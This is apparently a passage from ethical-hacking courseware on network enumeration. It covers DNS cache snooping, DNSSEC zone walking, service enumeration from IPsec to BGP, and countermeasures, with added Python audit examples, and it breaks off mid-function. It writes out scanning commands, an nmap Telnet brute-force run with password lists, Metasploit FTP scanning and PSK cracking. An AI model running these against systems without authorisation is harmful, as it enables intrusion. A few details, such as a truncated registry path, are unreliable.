In this method, the time-to-live (TTL) field is examined to determine the duration for which the DNS record remains in the cache. Here, the TTL value obtained from the result is compared with the TTL that was initially set in the TTL field. If the value in the result is less than the initial TTL value, the record is cached, indicating that someone on the system has visited that site. However, if the queried record were not present in the cache, it will be added to the cache after the first query is sent.
Attackers use the same dig command as in the non-recursive method but with the +recurse option instead of the +norecurse option:
dig @<IP of DNS server> <Target domain> A +recurse

As shown in the screenshot, the TTL value for the domain certifiedhacker.com is considerably low, which strongly suggests that the domain was already in the cache when the query was issued.
Figure 4.27: Screenshot of a dig query for a cached site (a low TTL value indicates a cached site)
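Both the zone-transfer check (dig ... axfr, Figure 4.23) and the two cache-snooping methods above are decided by reading dig's output: whether "Transfer failed." appears or zone records come back, whether a NOERROR reply carries an answer, and how far an answer's TTL has counted down. The following Python example is added here and is not part of the courseware; it parses captured dig text and applies those three readings. The sample outputs are constructed in dig's format with RFC 2606 example names, and the authoritative TTL passed to ttl_cached is assumed to come from the zone's own records.

```python
"""Applies the dig-based checks from this page to captured dig output: does a
name server honour AXFR, did a non-recursive probe get an answer, and does a
recursive answer's TTL show the record was already cached. Constructed example;
the sample outputs are made up in dig's format (not the page's screenshots)."""
import re
from collections import namedtuple
from dataclasses import dataclass, field
from typing import List, Optional

RR_LINE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+([A-Z0-9]+)\s+(.*)$")
STATUS = re.compile(r"status:\s*([A-Z]+)")
FLAGS = re.compile(r";; flags:\s*([a-z ]*);")

RR = namedtuple("RR", "name ttl rtype rdata section")   # section: answer/authority/additional


@dataclass
class DigResult:
    status: Optional[str] = None
    flags: List[str] = field(default_factory=list)
    records: List[RR] = field(default_factory=list)
    transfer_failed: bool = False


def parse_dig(text: str) -> DigResult:
    """Collect header status, flags and resource records from dig's text output."""
    result, section = DigResult(), "answer"   # AXFR output carries no section markers
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if "Transfer failed" in line:          # printed by dig when the AXFR is refused
            result.transfer_failed = True
        elif line.startswith(";"):
            if line.endswith("SECTION:"):
                section = line.strip("; ").split()[0].lower()
            if m := STATUS.search(line):
                result.status = m.group(1)
            if m := FLAGS.search(line):
                result.flags = m.group(1).split()
        elif m := RR_LINE.match(line):
            result.records.append(RR(m.group(1), int(m.group(2)), m.group(3), m.group(4), section))
    return result


def answers(result: DigResult, rtype: Optional[str] = None) -> List[RR]:
    return [r for r in result.records
            if r.section == "answer" and (rtype is None or r.rtype == rtype)]


def axfr_exposed(text: str) -> bool:
    """Zone transfer check: the server returned the zone (SOA first and last) instead
    of 'Transfer failed.' True means the allow-transfer policy is too open."""
    result = parse_dig(text)
    return not result.transfer_failed and any(r.rtype == "SOA" for r in result.records)


def nonrecursive_cached(text: str) -> bool:
    """+norecurse probe: NOERROR with an answer means the record was in the cache;
    NOERROR with no answer (only a referral) means it was not."""
    result = parse_dig(text)
    return result.status == "NOERROR" and bool(answers(result))


def ttl_cached(text: str, authoritative_ttl: int) -> bool:
    """+recurse probe: a TTL below the zone's TTL has been counting down in cache.
    The probe itself caches the record, so only the first probe is evidence."""
    a_records = answers(parse_dig(text), "A")
    return bool(a_records) and min(r.ttl for r in a_records) < authoritative_ttl


# Constructed dig outputs, modelled on the page's figures.
AXFR_REFUSED = """\
; <<>> DiG 9.11.5-P4-3-Debian <<>> @ns1.example.net example.com axfr
; (1 server found)
;; global options: +cmd
; Transfer failed.
"""
AXFR_LEAKED = """\
; <<>> DiG 9.11.5-P4-3-Debian <<>> @ns1.example.net example.com axfr
;; global options: +cmd
example.com.      3600 IN SOA  ns1.example.net. hostmaster.example.com. 2020110501 7200 3600 1209600 3600
example.com.      3600 IN NS   ns1.example.net.
www.example.com.  3600 IN A    203.0.113.10
vpn.example.com.  3600 IN A    203.0.113.20
example.com.      3600 IN SOA  ns1.example.net. hostmaster.example.com. 2020110501 7200 3600 1209600 3600
"""
NOT_CACHED = """\
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4242
;; flags: qr ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; QUESTION SECTION:
;www.example.com.              IN A
;; AUTHORITY SECTION:
.                 517992 IN NS a.root-servers.net.
"""
CACHED = """\
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4243
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; QUESTION SECTION:
;www.example.com.              IN A
;; ANSWER SECTION:
www.example.com.  289 IN A 203.0.113.10
"""
```

Resolvers that serve only their own users should refuse both recursive and cache lookups from outside that population; the checks above then return False for every external probe.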

DNSSEC Zone Walking
Domain Name System Security Extensions (DNSSEC) zone walking is a type of DNS enumeration technique in which an attacker attempts to obtain internal records if the DNS zone is not properly configured. The enumerated zone information can assist the attacker in building a host network map.
Organizations use DNSSEC to add security features to the DNS data and provide protection against known threats to the DNS. This security feature uses digital signatures based on public-key cryptography to strengthen authentication in DNS. These digital signatures are stored in the DNS name servers along with common records such as MX, A, AAAA, and CNAME.
While DNSSEC provides Internet security, it is also susceptible to a vulnerability called zone enumeration or zone walking. By exploiting this vulnerability, attackers can obtain network information of a target domain, based on which they may launch Internet-based attacks. To overcome the zone enumeration vulnerability, a new version of DNSSEC that uses Next Secure version 3 (NSEC3) is used. The NSEC3 record provides the same functionality as NSEC records, except that it provides cryptographically hashed record names that are designed to prevent the enumeration of record names present in the zone.
To perform zone enumeration, attackers can use various DNSSEC zone enumerators such as LDNS, DNSRecon, nsec3map, nsec3walker, and DNSwalk.
DNSSEC Zone Walking Tools
DNSSEC zone walking tools are used to enumerate the target domain's DNS record files. These tools can also perform zone enumeration on NSEC and NSEC3 record files and further use the gathered information to launch attacks such as denial-of-service (DoS) attacks and phishing.
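Why an NSEC chain enumerates the zone, and what NSEC3 changes, is easiest to see on a small zone. The following Python example is added here and is not part of the courseware: it walks a constructed NSEC chain built from a few of the iana.org names in the LDNS screenshot, then computes NSEC3 hashed owner names as RFC 5155 specifies (salted, iterated SHA-1, base32hex) to show that the chain a walker collects no longer contains names. The chain, salt and iteration count are made up.

```python
"""NSEC chain walking versus NSEC3 hashed owner names. An NSEC record names the
next owner in canonical order, so following the pointers from the apex lists
every name in the zone. NSEC3 (RFC 5155, section 5) replaces owner names with
salted, iterated SHA-1 hashes. Constructed example: the chain is a made-up
subset of the names in the LDNS screenshot, salt and iterations are arbitrary."""
import base64
import hashlib
from typing import Dict, List

# Constructed NSEC chain for iana.org: owner -> next owner, wrapping to the apex.
NSEC_CHAIN: Dict[str, str] = {
    "iana.org.": "app.iana.org.",
    "app.iana.org.": "apt.iana.org.",
    "apt.iana.org.": "autodiscover.iana.org.",
    "autodiscover.iana.org.": "blackhole-1.iana.org.",
    "blackhole-1.iana.org.": "data.iana.org.",
    "data.iana.org.": "iana.org.",
}


def walk_nsec(chain: Dict[str, str], start: str, limit: int = 10000) -> List[str]:
    """Follow next-owner pointers from `start` until the chain wraps around to it."""
    names, current = [start], start
    while len(names) < limit:
        current = chain[current]
        if current == start:
            return names
        names.append(current)
    raise ValueError("chain did not wrap around")


def wire_name(name: str) -> bytes:
    """Canonical (lower-case) wire format: length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.lower().rstrip(".").split("."):
        if label:
            out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def nsec3_hash(name: str, salt_hex: str, iterations: int) -> str:
    """RFC 5155 hashed owner name: H(x || salt), re-hashed `iterations` more times."""
    salt = bytes.fromhex(salt_hex)
    digest = hashlib.sha1(wire_name(name) + salt).digest()
    for _ in range(iterations):
        digest = hashlib.sha1(digest + salt).digest()
    # 20-byte digest -> 32 base32 characters using the extended-hex alphabet (RFC 4648 s7).
    b32 = base64.b32encode(digest).decode("ascii")
    return b32.translate(str.maketrans("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567",
                                       "0123456789ABCDEFGHIJKLMNOPQRSTUV")).lower()


def nsec3_chain(names: List[str], salt_hex: str, iterations: int) -> Dict[str, str]:
    """The chain a walker sees after NSEC3 signing: sorted hashes pointing at the next hash.
    The hashes can still be collected and guessed offline; the salt and iterations only
    raise that cost, so NSEC3 limits rather than removes enumeration."""
    hashes = sorted(nsec3_hash(n, salt_hex, iterations) for n in names)
    return {h: hashes[(i + 1) % len(hashes)] for i, h in enumerate(hashes)}


if __name__ == "__main__":
    print("NSEC walk from the apex:", walk_nsec(NSEC_CHAIN, "iana.org."))
    hashed = nsec3_chain(list(NSEC_CHAIN), "aabbccdd", 12)
    print("NSEC3 walk yields only hashes:", walk_nsec(hashed, min(hashed)))
```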

* LDNS
Source: https://www.nlnetlabs.nl
LDNS-walk enumerates the DNSSEC zone and obtains results on the DNS record files. As shown in the screenshot, attackers use the following query to enumerate a target domain iana.org using the DNS server 8.8.8.8 to obtain DNS record files:
ldns-walk @<IP of DNS Server> <Target domain>

Figure 4.28: Screenshot of LDNS displaying results on the target domain (enumerated DNS record files for iana.org with their CNAME, A, AAAA, MX, RRSIG, and NSEC records)
* DNSRecon
Source: https://www.github.com
DNSRecon is a zone enumeration tool that assists users in enumerating DNS records such as A, AAAA, and CNAME. It also performs zone enumeration to obtain NSEC record files of a target domain. As shown in the screenshot, attackers use the following query to perform zone enumeration against a target domain certifiedhacker.com:
dnsrecon -d <target domain> -z
Figure 4.29: Screenshot of DNSRecon displaying results on the target domain (obtained record file "A")
Module Flow
* NetBIOS Enumeration
* LDAP Enumeration
* Other Enumeration Techniques

Other Enumeration Techniques
This section discusses IPsec, VoIP, RPC, Unix/Linux user, Telnet, SSH user, FTP, TFTP, SMB, IPv6, and BGP enumeration.
IPsec Enumeration
IPsec is the most commonly implemented technology for both gateway-to-gateway (LAN-to-LAN) and host-to-gateway (remote access) enterprise VPN solutions. IPsec provides data security by employing various components such as Encapsulating Security Payload (ESP), Authentication Header (AH), and Internet Key Exchange (IKE) to secure communication between VPN endpoints.
Most IPsec-based VPNs use the Internet Security Association Key Management Protocol (ISAKMP), a part of IKE, to establish, negotiate, modify, and delete Security Associations (SA) and cryptographic keys in a VPN environment.
Attackers can perform simple direct scanning for ISAKMP at UDP port 500 with tools such as Nmap to acquire information related to the presence of a VPN gateway.

The following Nmap command can be used to perform a scan for checking the status of ISAKMP over port 500:
# nmap -sU -p 500 <target IP address>
Figure 4.30: Screenshot displaying an Nmap scan over port 500 for ISAKMP
Attackers can probe further using fingerprinting tools such as ike-scan to enumerate sensitive information, including the encryption and hashing algorithm, authentication type, key distribution algorithm, and SA Life Duration. In this type of scan, specially crafted IKE packets with an ISAKMP header are sent to the target gateway, and the responses are recorded.
The following command is used for initial IPsec VPN discovery with the ike-scan tool:
# ike-scan -M <target gateway IP address>

* ike-scan
Source: https://github.com
ike-scan discovers IKE hosts and can fingerprint them using the retransmission backoff pattern. ike-scan can perform the following functions.
o Discovery: The hosts running IKE in a given IP range can be determined by displaying the hosts that respond to the IKE requests sent by ike-scan.
o Fingerprinting: The IKE implementation used by the hosts can be determined, and in some cases, the version of the software they are running can be determined. This is done in two ways: UDP backoff fingerprinting, which involves recording the times of arrival of the IKE response packets from the target hosts and comparing the observed retransmission backoff pattern against known patterns, and Vendor ID fingerprinting, which compares Vendor ID payloads from the VPN servers against known Vendor ID patterns.
o Transform enumeration: The transform attributes supported by the VPN server for IKE phase 1 (e.g., encryption algorithm and hash algorithm) can be determined.
o User enumeration: For some VPN systems, valid VPN usernames can be discovered.
o Pre-shared key cracking: Offline dictionary or brute-force password cracking can be performed for IKE Aggressive Mode with pre-shared key authentication. This uses ike-scan to obtain the hash and other parameters as well as psk-crack, which is a part of the ike-scan package, to perform the cracking.

VoIP Enumeration
VoIP is an advanced technology that has replaced the conventional public switched telephone network (PSTN) in both corporate and home environments. VoIP uses internet infrastructure to establish connections for voice calls; data are also transmitted on the same network. However, VoIP is vulnerable to TCP/IP attack vectors. Session Initiation Protocol (SIP) is one of the protocols used by VoIP for performing voice calls, video calls, etc. over an IP network. This SIP service generally uses UDP/TCP ports 2000, 2001, 5050, and 5061.
Attackers use Svmap and Metasploit tools to perform VoIP enumeration. Through VoIP enumeration, attackers can gather sensitive information such as VoIP gateway/servers, IP-private branch exchange (PBX) systems, and User-Agent and user extensions of client software (softphones) or VoIP phones. This information can be used to launch various VoIP attacks such as DoS attacks, session hijacking, caller ID spoofing, eavesdropping, spam over Internet telephony (SPIT), and VoIP phishing (Vishing).
* svmap
Source: https://github.com
Svmap is an open-source scanner that identifies SIP devices and PBX servers on a target network. It can be helpful for system administrators when used as a network inventory tool.
Attackers use Svmap to perform the following:
o Identify SIP devices and PBX servers on default and non-default ports
o Scan large ranges of networks
o Scan one host on different ports for an SIP service on that host or multiple hosts on multiple ports
o Ring all the phones on a network simultaneously using the INVITE method
The screenshot below shows an example of the enumeration of SIP device details using the Svmap tool through the following command:
# svmap <target network range>

Figure 4.32: Screenshot displaying svmap scan for enumerating SIP details
Attackers use Metasploit's SIP Username Enumerator scan to enumerate numeric usernames/extensions of VoIP phones. The screenshot below shows an example of enumerating SIP using Metasploit.
Figure 4.33: Screenshot displaying Metasploit exploit for SIP enumeration
RPC Enumeration
The remote procedure call (RPC) is a technology used for creating distributed client/server programs. RPC allows clients and servers to communicate in distributed client/server programs. It is an inter-process communication mechanism, which enables data exchange between different processes. In general, RPC consists of components such as a client, a server, an endpoint, an endpoint mapper, a client stub, and a server stub, along with various dependencies. The portmapper service listens on TCP and UDP port 111 to detect the endpoints and present clients with details of listening RPC services. Enumerating RPC endpoints enables attackers to identify any vulnerable services on these service ports. In networks protected by firewalls and other security establishments, this portmapper is often filtered. Therefore, attackers scan wide port ranges to identify RPC services that are open to direct attack.

Attackers use the following Nmap scan commands to identify the RPC service running on the network:
# nmap -sR <target IP/network>
# nmap -T4 -A <target IP/network>
Figure 4.34: Screenshot displaying an Nmap scan result for RPC enumeration
Additionally, attackers use tools such as NetScanTools Pro to capture the RPC information of the target network. The NetScanTools Pro RPC Info tool helps attackers detect and access the portmapper daemon/service that typically runs on port 111 of Unix or Linux machines.

Figure 4.35: Screenshot displaying the NetScanTools Pro tool for RPC enumeration
Unix/Linux User Enumeration
One of the important steps for enumeration is to perform Unix/Linux user enumeration. Unix/Linux user enumeration provides a list of users along with details such as the username, host name, and start date and time of each session.
The following command-line utilities can be used to perform Unix/Linux user enumeration.
* rusers
rusers displays a list of users who are logged in to remote machines or machines on the local network. It displays an output similar to the who command, but for the hosts/systems on the local network. Its syntax is as follows:
/usr/bin/rusers [-a] [-l] [-u | -h | -i] [Host ...]
The options are as follows.
o -a: Gives a report for a machine even if no users are logged in
o -l: Gives a longer listing similar to the who command
o -h: Sorts alphabetically by host name
o -i: Sorts by idle time
o -u: Sorts by the number of users
* rwho
rwho displays a list of users who are logged in to hosts on the local network. Its output is similar to that of the who command and contains information about the username, host name, and start date and time of each session for all machines on the local network running the rwho daemon. Its syntax is as follows:

rwho [-a]
It has the following option.
o -a: Includes all users; without this flag, users whose sessions are idle for an hour or more are not included in the report
* finger
finger displays information about system login users such as the user's name, real name, terminal name, idle time, login time, office location, and office phone numbers. Its syntax is as follows:
finger [-l] [-m] [-p] [-s] [user ...] [user@host ...]
The options are as follows.
o -s: Displays the user's login name, real name, terminal name, idle time, login time, office location, and office phone number
o -l: Produces a multi-line format displaying all the information described for the -s option as well as the user's home directory, home phone number, login shell, mail status, and the contents of the files ".plan," ".project," ".pgpkey," and ".forward" from the user's home directory
o -p: Prevents the -l option of finger from displaying the contents of the ".plan," ".project," and ".pgpkey" files
o -m: Prevents the matching of usernames

Figure 4.36: Screenshot displaying the execution of the finger command for user enumeration
Telnet Enumeration
Telnet is a network terminal protocol that allows users to access remote computers or servers over the Internet. This protocol provides two-way interactive communication for computers on LANs and the Internet. Depending on the privileges assigned to the users, they can use Telnet to login to the remote system to access specific files, services, data, etc.
Attackers perform port scanning to gather information regarding open ports and services on the target server. If the Telnet port is found to be open, attackers can learn about the information being shared, including hardware and software information of the target. By using this information, attackers can exploit their specific vulnerabilities and perform a brute-force attack to gain unauthorized access to the target system. Attackers can use the Nmap tool to perform simple direct scanning for Telnet port 23.
As shown in the screenshot, the following Nmap command is used by attackers to enumerate the Telnet service running on the target system:
# nmap -p 23 <target domain>

Figure 4.37: Screenshot displaying a Telnet enumeration result of Nmap (port 23 is filtered, indicating that it is blocked by a firewall or some other network obstacle)
Attackers can further use the following script to enumerate information from remote Microsoft Telnet services with New Technology LAN Manager (NTLM) authentication enabled:
# nmap -p 23 --script telnet-ntlm-info <target IP>
Once the information about the target server is obtained, the attackers can use the following script to perform a brute-force attack against the Telnet server:
# nmap -p 23 --script telnet-brute.nse --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt <target IP>
SMB Enumeration
Server Message Block (SMB) protocol is a transport that is generally used by Windows systems for providing shared access to files, printers, and serial ports as well as remote access to Windows services. By default, SMB runs directly on TCP port 445 or via the NetBIOS API on UDP ports 137 and 138 and TCP ports 137 and 139. By using the SMB service, users can access files and other data stored at a remote server. The SMB service also allows application users to read, write, and modify the files on the remote server. A network running this service is highly vulnerable to SMB enumeration, which provides a good amount of information about the target.
In SMB enumeration, attackers generally perform banner grabbing to obtain information such as OS details and versions of services running. By using this information, attackers can perform various attacks such as SMB relay attacks and brute-force attacks. Attackers can also use SMB enumeration tools such as Nmap, SMBMap, enum4linux, nullinux, and NetScanTools Pro to perform a directed scan on the SMB service running on port 445.
As shown in the screenshot, attackers use the following Nmap command to enumerate the SMB service running on the target IP address:
# nmap -p 445 -A <target IP>
In the above command, the option -p specifies a port to scan (445 in this case), and option -A is used for OS detection, version detection, script scanning, and traceroute information.

Figure 4.38: Screenshot of Nmap performing SMB enumeration (open port 445 and SMB details)
The STATE of PORT 445/tcp is OPEN, which indicates that port 445 is open and that the SMB service is running. By using this command, attackers can also obtain details on the OS and traceroute of the specified target.

FTP Enumeration
The File Transfer Protocol (FTP) is used to transfer files over TCP, and its default port is 21. In FTP, data are transferred in plaintext between a sender and receiver, exposing critical information such as usernames and passwords to attackers. FTP offers neither a secure network environment nor secure user authentication. Individuals do not need authentication to access an FTP server in a network. This provides an easy method for attackers to access network resources.
The implementation of FTP in an organization's network makes the data accessible to external sources. Attackers can scan and enumerate open port 21 running FTP services and further use this information to launch various attacks such as FTP bounce, FTP brute force, and packet sniffing.
As shown in the screenshot, the following Nmap command is used by the attackers to enumerate the FTP service running on the target domain:
# nmap -p 21 <target domain>

Figure 4.39: Screenshot of Nmap displaying FTP enumeration result (port 21 is filtered, indicating that it is blocked by a firewall or some other network obstacle)
Attackers also use Metasploit to enumerate FTP services running on remote hosts. The following commands can be used to detect the FTP version of the target server:
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS <target IP>
msf auxiliary(scanner/ftp/ftp_version) > exploit
TFTP Enumeration
The Trivial File Transfer Protocol (TFTP) is a simplified version of FTP and is used for transferring files between network devices. By default, TFTP servers listen on UDP port 69. This protocol is used when directory visibility and user authentication are not required; therefore, it provides no security features.
To perform TFTP enumeration, attackers can use tools such as PortQry and Nmap to extract information such as running TFTP services and files stored on a remote server. By using the enumerated information, attackers can further gain unauthorized access to the target system, steal important files, and upload malicious scripts to launch further attacks. Furthermore, this information enables attackers to perform various attacks such as DNS amplification attacks, TFTP reflection attacks, and DDoS attacks.

* PortQry
Source: https://www.microsoft.com
The PortQry utility reports the port status of TCP and UDP ports on a selected target. Attackers can use the PortQry tool to perform TFTP enumeration. This utility reports the port status of target TCP and UDP ports on a local or remote computer. In the PortQry tool, attackers specify the target to scan for a running TFTP service on open port 69. As shown in the screenshot, the attackers can perform TFTP enumeration on the target domain by setting the Ports to query: value to 69 and Protocol to UDP.

Figure 4.40: Screenshot of the PortQry tool displaying a TFTP scan result
Attackers can also use the PortQry command-line utility to perform TFTP enumeration using the following command:
portqry -n <target domain> -e 69 -p udp
Figure 4.41: Screenshot of the PortQry command-line utility showing a TFTP scan result
* Nmap
Source: https://nmap.org
Attackers can use the Nmap tool to perform simple direct scanning for TFTP port 69. As shown in the screenshot, the following Nmap command is used by attackers to enumerate the TFTP service running on the target domain:
# nmap -p 69 <target domain>

Figure 4.42: Screenshot of Nmap command displaying a TFTP scan result (port 69 is filtered, indicating that it is blocked by a firewall or some other network obstacle)
IPv6 Enumeration
Internet Protocol version 6 (IPv6) is an addressing protocol that identifies computer systems, including location information, and assists in routing traffic from one system to another system across a network. It is an advanced version of IPv4 and, therefore, supports a greater number of hosts as compared to IPv4. It was designed to overcome the problem of IPv4 address exhaustion.
Attackers perform IPv6 enumeration on target hosts to obtain their IPv6 addresses and further scan the enumerated IP addresses to detect various security problems such as access to routing structure, exposure of sensitive content, and users' access control lists. By using this information, attackers can launch various attacks such as SYN flood attacks, DNS amplification attacks, and DDoS attacks.
Attackers can scan and enumerate the IPv6 address of a target machine in the network by using various tools such as Enyx and IPv6 Hackit.
* Enyx
Source: https://github.com
Enyx is an enumeration tool that fetches the IPv6 address of a machine through SNMP. As shown in the screenshot, attackers use the following command to enumerate the IPv6 address of a target machine (10.10.10.20) by setting the SNMP version to 2c and the community string to public:
python enyx.py 2c public <target IP>

IPv6 Hackit
Source: http://ipv6hackit.sourceforge.net
Hackit is a scanning tool that provides a list of active IPv6 hosts. It can perform TCP port scanning and identify AAAA IPv6 host records. As shown in the screenshot, attackers can specify the target machine and run a scan to enumerate the IPv6 information.

Figure 4.44: Screenshot displaying the IPv6 Hackit tool
BGP Enumeration

The Border Gateway Protocol (BGP) is a routing protocol used to exchange routing and reachability information between different autonomous systems (AS) on the Internet. Because this protocol is used to connect one AS to other ASs, it is also called external BGP (eBGP). BGP finds the shortest path to route traffic from one IP address to another efficiently. BGP creates its TCP session on port 179.

Attackers perform BGP enumeration on the target using tools such as Nmap and BGP Toolkit to discover the IPv4 prefixes indicated by the AS number and the routing path followed by the target. Attackers use this information to launch various attacks against the target, such as man-in-the-middle attacks, BGP hijacking attacks, and DoS attacks.

As shown in the screenshot, attackers use the following Nmap command to enumerate BGP running on the target system:
# nmap -p 179 <target IP>

Figure 4.45: Screenshot of Nmap displaying the BGP enumeration result
As shown in the screenshot, attackers use BGP Toolkit to perform BGP enumeration on the target domain. This online tool can be used to search the target domain and obtain details such as DNS information, website information, IP information, AS information, and whois information. Based on the identified ASs, attackers can further enumerate details such as IPv4 prefixes, BGP graphs, routing, and IPv4 peers.

Figure 4.46: Screenshot of BGP Toolkit
Enumeration Countermeasures
Thus far, we have described enumeration techniques and tools used to extract valuable information from targets. Next, we discuss countermeasures that can prevent attackers from enumerating sensitive information from a network or host. This section focuses on methods to avoid information leakage through SNMP, DNS, SMTP, LDAP, SMB, NFS, and FTP enumeration.

SNMP Enumeration Countermeasures
▪ Remove the SNMP agent or turn off the SNMP service.
▪ If turning off SNMP is not an option, then change the default community string names.
▪ Upgrade to SNMP3, which encrypts passwords and messages.
▪ Implement the Group Policy option called "Additional restrictions for anonymous connections."
▪ Ensure that the access to null session pipes, null session shares, and IPsec filtering is restricted.
▪ Block access to TCP/UDP port 161.
▪ Do not install the management and monitoring Windows component unless required.
▪ Encrypt or authenticate using IPsec.
▪ Do not misconfigure the SNMP service with read-write authorization.
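The community-string countermeasures above (default names, read-write authorization, SNMPv3) can be checked mechanically. The following is an added example, not code from the courseware: it audits a Net-SNMP style snmpd.conf, assuming the directive syntax rocommunity/rwcommunity/com2sec (v1/v2c) and rouser/rwuser (v3); both sample configurations are constructed.

```python
"""Audit a Net-SNMP style snmpd.conf against the SNMP countermeasures above.

Added example (not from the CEH courseware). It assumes the Net-SNMP
directive syntax: `rocommunity COMMUNITY [SOURCE ...]`, `rwcommunity ...`,
`com2sec NAME SOURCE COMMUNITY` for v1/v2c, and `rouser`/`rwuser` for v3.
The sample configurations at the bottom are constructed.
"""
from dataclasses import dataclass

# Well-known default community strings; extend with the vendor defaults you track.
DEFAULT_COMMUNITIES = {"public", "private"}
V12C_DIRECTIVES = {"rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"}


@dataclass
class Finding:
    line: int      # 0 marks a file-wide finding
    message: str


def _check_community(num, community, source, read_write, findings):
    """Per-community checks: read-write access, default name, unrestricted source."""
    if read_write:
        findings.append(Finding(num, f"read-write community '{community}' grants SET access"))
    if community.lower() in DEFAULT_COMMUNITIES:
        findings.append(Finding(num, f"default community string '{community}' in use"))
    if source == "default":
        findings.append(Finding(num, f"community '{community}' accepts requests from any source"))


def audit_snmpd_conf(text: str) -> list:
    findings = []
    v12c_entries = 0
    v3_users = 0
    for num, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        tokens = line.split()
        directive = tokens[0].lower()
        if directive in V12C_DIRECTIVES and len(tokens) >= 2:
            v12c_entries += 1
            # SOURCE is optional; a following "-V view" option is not a source.
            source = "default"
            if len(tokens) >= 3 and not tokens[2].startswith("-"):
                source = tokens[2]
            _check_community(num, tokens[1], source, directive.startswith("rw"), findings)
        elif directive == "com2sec" and len(tokens) >= 4:
            v12c_entries += 1
            # The access level of a com2sec mapping is decided by group/access
            # lines, so only the default-name and open-source checks apply here.
            _check_community(num, tokens[3], tokens[2], False, findings)
        elif directive in ("rouser", "rwuser"):
            v3_users += 1
    if v12c_entries and not v3_users:
        findings.append(Finding(0, "only SNMPv1/v2c communities are configured; "
                                   "upgrade to SNMPv3 (rouser/rwuser with priv)"))
    return findings


# Constructed sample: the weak configuration the countermeasures warn about.
WEAK_CONF = "\n".join([
    "# constructed sample snmpd.conf",
    "rocommunity public",
    "rwcommunity private 192.168.1.0/24",
    "com2sec readonly default s3cr3t-ro-string",
    "rocommunity monitoring 10.0.0.5",
])

# Constructed sample: SNMPv3 only, read-only, authentication and privacy required.
HARDENED_CONF = "\n".join([
    "# constructed sample snmpd.conf (createUser normally lives in the persistent config)",
    "rouser monitor priv",
])


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {name} ==")
        for f in audit_snmpd_conf(conf):
            print(f"line {f.line}: {f.message}")
```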
DNS Enumeration Countermeasures
▪ Disable DNS zone transfers to untrusted hosts.
▪ Ensure that the private hosts and their IP addresses are not published in the DNS zone files of the public DNS server.
▪ Use premium DNS registration services that hide sensitive information such as host information (HINFO) from the public.
▪ Use standard network admin contacts for DNS registrations to avoid social engineering attacks.
▪ Prune DNS zone files to prevent revealing unnecessary information.
SMTP Enumeration Countermeasures
SMTP servers should be configured in the following manner.
▪ Ignore email messages to unknown recipients.
▪ Exclude sensitive information on mail servers and local hosts in mail responses.
▪ Disable the open relay feature.
▪ Limit the number of accepted connections from a source to prevent brute-force attacks.
▪ Disable EXPN, VRFY, and RCPT TO commands or restrict them to authentic users.
▪ Ignore emails to unknown recipients by configuring SMTP servers.
LDAP Enumeration Countermeasures
▪ By default, LDAP traffic is transmitted unsecured; therefore, use Secure Sockets Layer (SSL) technology or STARTTLS to encrypt the traffic.
▪ Select a username different from the email address and enable account lockout.
▪ Restrict access to Active Directory by using software such as Citrix.
▪ Use NTLM or any basic authentication mechanism to limit access to legitimate users.
SMB Enumeration Countermeasures
Common sharing services or other unused services may provide doorways for attackers to break into a network's security. A network running SMB is at a high risk of enumeration. Since web and DNS servers do not require this protocol, it is advisable to disable it on them. The SMB protocol can be disabled by disabling the properties Client for Microsoft Networks and File and Printer Sharing for Microsoft Networks in Network and Dial-up Connections. On servers that are accessible from the Internet, also known as bastion hosts, SMB can be disabled by disabling the same two properties of the TCP/IP properties dialog box. Another method of disabling the SMB protocol on bastion hosts, without explicitly disabling it, is by blocking the ports used by the SMB service. These are TCP ports 139 and 445.

Because disabling SMB services is not always a feasible option, other countermeasures against SMB enumeration may be required. Windows Registry can be configured to limit anonymous access from the Internet to a specified set of files. These files and folders are specified in the Network access: Named pipes that can be accessed anonymously and Network access: Shares that can be accessed anonymously settings. This configuration involves adding the RestrictNullSessAccess parameter to the registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanSe
The RestrictNullSessAccess parameter takes binary values, with 1 denoting enabled and 0 denoting disabled. Setting this parameter to 1 or enabled restricts the access of anonymous users to the files specified in the Network access settings.

The following are additional countermeasures for defending against SMB enumeration.
▪ Ensure that Windows Firewall or similar endpoint protection systems are enabled on the system.
▪ Install the latest security patches for Windows and third-party software.
▪ Implement a proper authentication mechanism with a strong password policy.
▪ Implement strong permissions to keep the stored information safe.
▪ Perform a regular audit of system logs.
▪ Perform active system monitoring to monitor the systems for any malicious incident.
NFS Enumeration Countermeasures
▪ Implement proper permissions (read/write must be restricted to specific users) in exported file systems.
▪ Implement firewall rules to block NFS port 2049.
▪ Ensure the proper configuration of files such as /etc/smb.conf, /etc/exports, and /etc/hosts.allow to protect the data stored in the server.
▪ Log the requests to access the system files on the NFS server.
▪ Keep the root_squash option in the /etc/exports file turned ON so that no requests made as root on the client are trusted.
▪ Implement NFS tunneling through SSH to encrypt the NFS traffic over the network.
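The /etc/exports checks above (read/write restricted to specific hosts, root_squash kept on) as an added example that is not part of the courseware: it parses the standard exports(5) syntax `PATH CLIENT(OPTIONS) ...` and reports the two weaknesses; the sample exports file is constructed.

```python
"""Audit /etc/exports lines against the NFS countermeasures above.

Added example (not from the CEH courseware). It assumes the standard
exports(5) syntax `PATH CLIENT(OPTIONS) [CLIENT(OPTIONS) ...]`; the sample
file at the bottom is constructed.
"""
from dataclasses import dataclass


@dataclass
class ExportFinding:
    line: int
    path: str
    client: str
    severity: str
    message: str


def _is_wildcard(client: str) -> bool:
    # "" arises from "/path (rw)" (a space before the options), which exportfs
    # treats as an export to every host.
    return client == "" or "*" in client or "?" in client


def parse_exports(text: str):
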